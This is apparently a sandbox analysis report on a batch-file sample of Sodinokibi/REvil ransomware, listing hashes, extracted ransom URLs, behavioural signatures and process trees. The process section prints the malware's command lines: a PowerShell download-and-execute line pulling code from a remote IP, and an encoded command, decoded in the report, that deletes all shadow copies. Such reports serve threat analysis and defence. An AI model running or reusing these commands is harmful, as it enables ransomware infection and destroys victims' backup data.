Analysis
Max time kernel: 42s
Max time network: 51s
Platform: windows7_x64
Resource: win7v200722
Submitted: 19-08-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: 6b344dbcf15e9fffe23ce5307af78070.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 6b344dbcf15e9fffe23ce5307af78070.bat
  Resource: win10
General
Target: 6b344dbcf15e9fffe23ce5307af78070.bat
Size: 215B
MD5: edcaf035412a5f6b004822eeba9ec0bc
SHA1: 5b65ca011d951eaa8266950415eb13dc55766d40
SHA256: a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383
SHA512: 10e58b8f554cca5133ebb0c33800a2de7e063712a791832eaa505379a7897375737f20bad7c7ce0e6ecd1e79e2ab2d5728529fa6a3750f050d56509503474c02
Malware Config
Extracted: http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070
Extracted: C:\7h6tcv2-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1481311B8AFEB78D
    http://decryptor.cc/1481311B8AFEB78D
Signatures

Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
Processes:
  flow | pid | process
  3 | 1500 | powershell.exe

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\isrmgc0.bmp" | powershell.exe
Drops file in Program Files directory (33 IoCs)
Processes: powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid | process
  1500 | powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid | process
  1500 | powershell.exe
  1500 | powershell.exe
  1500 | powershell.exe
  1820 | powershell.exe
  1820 | powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1500 | powershell.exe
  Token: SeDebugPrivilege | 1500 | powershell.exe
  Token: SeDebugPrivilege | 1820 | powershell.exe
  Token: SeBackupPrivilege | 1576 | vssvc.exe
  Token: SeRestorePrivilege | 1576 | vssvc.exe
  Token: SeAuditPrivilege | 1576 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1500 | powershell.exe

Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
  description | pid | process | target process
  PID 1412 wrote to memory of 1500 | 1412 | cmd.exe | powershell.exe
  PID 1412 wrote to memory of 1500 | 1412 | cmd.exe | powershell.exe
  PID 1412 wrote to memory of 1500 | 1412 | cmd.exe | powershell.exe
  PID 1412 wrote to memory of 1500 | 1412 | cmd.exe | powershell.exe
  PID 1500 wrote to memory of 1820 | 1500 | powershell.exe | powershell.exe
  PID 1500 wrote to memory of 1820 | 1500 | powershell.exe | powershell.exe
  PID 1500 wrote to memory of 1820 | 1500 | powershell.exe | powershell.exe
  PID 1500 wrote to memory of 1820 | 1500 | powershell.exe | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\6b344dbcf15e9fffe23ce5307af78070.bat"
  PID: 1412
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070');Invoke-LPYNMMII;Start-Sleep -s 10000"
    PID: 1500
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument decodes from base64/UTF-16LE to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      PID: 1820
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1576
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken